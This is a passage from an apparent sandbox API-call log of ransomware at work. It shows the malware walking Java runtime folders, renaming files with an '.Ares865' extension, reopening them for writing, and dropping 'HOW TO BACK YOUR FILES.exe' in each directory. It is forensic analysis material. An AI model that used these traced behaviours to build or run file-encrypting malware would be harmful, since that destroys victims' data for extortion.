lpFileSize=0x2cce090*=77) returned 1 [0136.177] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Sao_Tome" | out: lpString1="Sao_Tome") returned="Sao_Tome" [0136.177] lstrlenW (lpString="Sao_Tome") returned 8 [0136.177] lstrlenW (lpString="Ares865") returned 7 [0136.177] lstrcmpiW (lpString1="ao_Tome", lpString2="Ares865") returned -1 [0136.177] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Sao_Tome.Ares865") returned 63 [0136.177] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Sao_Tome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\sao_tome"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Sao_Tome.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\sao_tome.ares865"), dwFlags=0x1) returned 1 [0136.179] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Sao_Tome.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\sao_tome.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.179] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0136.182] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Tripoli" | out: lpString1="Tripoli") returned="Tripoli" [0136.182] lstrlenW (lpString="Tripoli") returned 7 [0136.182] lstrlenW (lpString="Ares865") returned 7 [0136.183] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tripoli.Ares865") returned 62 [0136.183] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tripoli" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tripoli"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tripoli.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tripoli.ares865"), dwFlags=0x1) returned 1 [0136.187] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tripoli.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tripoli.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.187] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=732) returned 1 [0136.190] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Tunis" | out: lpString1="Tunis") returned="Tunis" [0136.190] lstrlenW (lpString="Tunis") returned 5 [0136.190] lstrlenW (lpString="Ares865") returned 7 [0136.190] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tunis.Ares865") returned 60 [0136.190] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tunis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tunis"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tunis.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tunis.ares865"), dwFlags=0x1) returned 1 [0136.192] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tunis.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tunis.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.192] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=329) returned 1 [0136.195] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Windhoek" | out: lpString1="Windhoek") returned="Windhoek" [0136.195] lstrlenW (lpString="Windhoek") returned 8 [0136.195] lstrlenW (lpString="Ares865") returned 7 [0136.195] lstrcmpiW (lpString1="indhoek", lpString2="Ares865") returned 1 [0136.196] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Windhoek.Ares865") returned 63 [0136.196] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Windhoek" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\windhoek"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Windhoek.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\windhoek.ares865"), dwFlags=0x1) returned 1 [0136.197] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Windhoek.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\windhoek.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.197] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=824) returned 1 [0136.200] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\security", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\security") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\security" [0136.201] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\security" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\security") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\security" [0136.201] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0136.201] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\how to back your files.exe"), bFailIfExists=1) returned 0 [0136.201] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0136.202] GetLastError () returned 0x0 [0136.203] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0136.203] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x744e3080, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x530e1440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x530e1440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0136.203] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0136.203] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0136.203] lstrcpyW (in: lpString1=0x2cce45c, lpString2="blacklist" | out: lpString1="blacklist") returned="blacklist" [0136.203] lstrlenW (lpString="blacklist") returned 9 [0136.204] lstrlenW (lpString="Ares865") returned 7 [0136.204] lstrcmpiW (lpString1="acklist", lpString2="Ares865") returned -1 [0136.204] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\blacklist.Ares865") returned 63 [0136.204] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\blacklist" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\blacklist"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\blacklist.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\blacklist.ares865"), dwFlags=0x1) returned 1 [0136.205] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\blacklist.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\blacklist.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.205] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2770) returned 1 [0136.208] lstrcpyW (in: lpString1=0x2cce45c, lpString2="cacerts" | out: lpString1="cacerts") returned="cacerts" [0136.208] lstrlenW (lpString="cacerts") returned 7 [0136.208] lstrlenW (lpString="Ares865") returned 7 [0136.209] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\cacerts.Ares865") returned 61 [0136.209] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\cacerts" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\cacerts"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\cacerts.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\cacerts.ares865"), dwFlags=0x1) returned 1 [0136.211] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\cacerts.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\cacerts.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.211] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=82586) returned 1 [0136.219] lstrcpyW (in: lpString1=0x2cce45c, lpString2="java.policy" | out: lpString1="java.policy") returned="java.policy" [0136.219] lstrlenW (lpString="java.policy") returned 11 [0136.219] lstrlenW (lpString="Ares865") returned 7 [0136.219] lstrcmpiW (lpString1=".policy", lpString2="Ares865") returned -1 [0136.219] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.policy.Ares865") returned 65 [0136.219] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.policy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.policy"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.policy.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.policy.ares865"), dwFlags=0x1) returned 1 [0136.221] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.policy.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.policy.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.221] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2254) returned 1 [0136.224] lstrcpyW (in: lpString1=0x2cce45c, lpString2="java.security" | out: lpString1="java.security") returned="java.security" [0136.224] lstrlenW (lpString="java.security") returned 13 [0136.224] lstrlenW (lpString="Ares865") returned 7 [0136.224] lstrcmpiW (lpString1="ecurity", lpString2="Ares865") returned 1 [0136.224] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.security.Ares865") returned 67 [0136.225] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.security" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.security"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.security.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.security.ares865"), dwFlags=0x1) returned 1 [0136.226] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\java.security.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\java.security.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.227] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17824) returned 1 [0136.230] lstrcpyW (in: lpString1=0x2cce45c, lpString2="javafx.policy" | out: lpString1="javafx.policy") returned="javafx.policy" [0136.230] lstrlenW (lpString="javafx.policy") returned 13 [0136.230] lstrlenW (lpString="Ares865") returned 7 [0136.230] lstrcmpiW (lpString1=".policy", lpString2="Ares865") returned -1 [0136.231] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javafx.policy.Ares865") returned 67 [0136.231] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javafx.policy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javafx.policy"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javafx.policy.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javafx.policy.ares865"), dwFlags=0x1) returned 1 [0136.232] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javafx.policy.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javafx.policy.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.232] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=158) returned 1 [0136.236] lstrcpyW (in: lpString1=0x2cce45c, lpString2="javaws.policy" | out: lpString1="javaws.policy") returned="javaws.policy" [0136.236] lstrlenW (lpString="javaws.policy") returned 13 [0136.236] lstrlenW (lpString="Ares865") returned 7 [0136.236] lstrcmpiW (lpString1=".policy", lpString2="Ares865") returned -1 [0136.236] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy.Ares865") returned 67 [0136.236] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javaws.policy"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javaws.policy.ares865"), dwFlags=0x1) returned 1 [0136.238] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javaws.policy.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.238] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=98) returned 1 [0136.241] lstrcpyW (in: lpString1=0x2cce45c, lpString2="local_policy.jar" | out: lpString1="local_policy.jar") returned="local_policy.jar" [0136.242] lstrlenW (lpString="local_policy.jar") returned 16 [0136.242] lstrlenW (lpString="Ares865") returned 7 [0136.242] lstrcmpiW (lpString1="icy.jar", lpString2="Ares865") returned 1 [0136.242] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar.Ares865") returned 70 [0136.242] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\local_policy.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\local_policy.jar.ares865"), dwFlags=0x1) returned 1 [0136.243] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\local_policy.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\local_policy.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.243] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2971) returned 1 [0136.246] lstrcpyW (in: lpString1=0x2cce45c, lpString2="trusted.libraries" | out: lpString1="trusted.libraries") returned="trusted.libraries" [0136.246] lstrlenW (lpString="trusted.libraries") returned 17 [0136.246] lstrlenW (lpString="Ares865") returned 7 [0136.246] lstrcmpiW (lpString1="braries", lpString2="Ares865") returned 1 [0136.247] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\trusted.libraries.Ares865") returned 71 [0136.247] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\trusted.libraries" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\trusted.libraries"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\trusted.libraries.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\trusted.libraries.ares865"), dwFlags=0x1) returned 1 [0136.249] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\trusted.libraries.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\trusted.libraries.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.249] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0136.249] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0136.249] CloseHandle (hObject=0x0) returned 0 [0136.249] CloseHandle (hObject=0x118) returned 1 [0136.249] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744e3080, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x744e3080, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x744e3080, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x9b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="US_export_policy.jar", cAlternateFileName="US_EXP~1.JAR")) returned 1 [0136.249] lstrcmpiW (lpString1="US_export_policy.jar", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0136.249] lstrcmpiW (lpString1="US_export_policy.jar", lpString2="aoldtz.exe") returned 1 [0136.249] lstrcpyW (in: lpString1=0x2cce45c, lpString2="US_export_policy.jar" | out: lpString1="US_export_policy.jar") returned="US_export_policy.jar" [0136.249] lstrlenW (lpString="US_export_policy.jar") returned 20 [0136.249] lstrlenW (lpString="Ares865") returned 7 [0136.249] lstrcmpiW (lpString1="icy.jar", lpString2="Ares865") returned 1 [0136.250] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar.Ares865") returned 74 [0136.250] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\us_export_policy.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\us_export_policy.jar.ares865"), dwFlags=0x1) returned 1 [0136.253] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\us_export_policy.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.254] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2487) returned 1 [0136.257] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\management", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\management") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\management" [0136.258] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\management" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\management") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\management" [0136.258] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0136.258] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\how to back your files.exe"), bFailIfExists=1) returned 0 [0136.258] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0136.259] GetLastError () returned 0x0 [0136.259] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0136.259] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x744bcf20, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x531075a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x531075a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0136.259] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0136.259] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0136.260] lstrcpyW (in: lpString1=0x2cce460, lpString2="jmxremote.access" | out: lpString1="jmxremote.access") returned="jmxremote.access" [0136.260] lstrlenW (lpString="jmxremote.access") returned 16 [0136.260] lstrlenW (lpString="Ares865") returned 7 [0136.260] lstrcmpiW (lpString1=".access", lpString2="Ares865") returned -1 [0136.260] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.access.Ares865") returned 72 [0136.260] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.access" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.access"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.access.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.access.ares865"), dwFlags=0x1) returned 1 [0136.261] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\jmxremote.access.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\jmxremote.access.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.262] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3998) returned 1 [0136.264] lstrcpyW (in: lpString1=0x2cce460, lpString2="jmxremote.password.template.Ares865" | out: lpString1="jmxremote.password.template.Ares865") returned="jmxremote.password.template.Ares865" [0136.264] lstrlenW (lpString="jmxremote.password.template.Ares865") returned 35 [0136.264] lstrlenW (lpString="Ares865") returned 7 [0136.264] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0136.264] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744bcf20, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x744bcf20, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x744bcf20, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x3711, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="management.properties", cAlternateFileName="MANAGE~1.PRO")) returned 1 [0136.264] lstrcmpiW (lpString1="management.properties", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0136.265] lstrcmpiW (lpString1="management.properties", lpString2="aoldtz.exe") returned 1 [0136.265] lstrcpyW (in: lpString1=0x2cce460, lpString2="management.properties" | out: lpString1="management.properties") returned="management.properties" [0136.265] lstrlenW (lpString="management.properties") returned 21 [0136.265] lstrlenW (lpString="Ares865") returned 7 [0136.265] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0136.265] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\management.properties.Ares865") returned 77 [0136.265] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\management.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\management.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\management.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\management.properties.ares865"), dwFlags=0x1) returned 1 [0136.267] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\management.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\management.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0136.267] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14097) returned 1 [0136.270] lstrcpyW (in: lpString1=0x2cce460, lpString2="snmp.acl.template.Ares865" | out: lpString1="snmp.acl.template.Ares865") returned="snmp.acl.template.Ares865" [0136.270] lstrlenW (lpString="snmp.acl.template.Ares865") returned 25 [0136.270] lstrlenW (lpString="Ares865") returned 7 [0136.270] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0136.270] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744bcf20, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x744bcf20, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x531075a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1030, dwReserved0=0xa0000003, 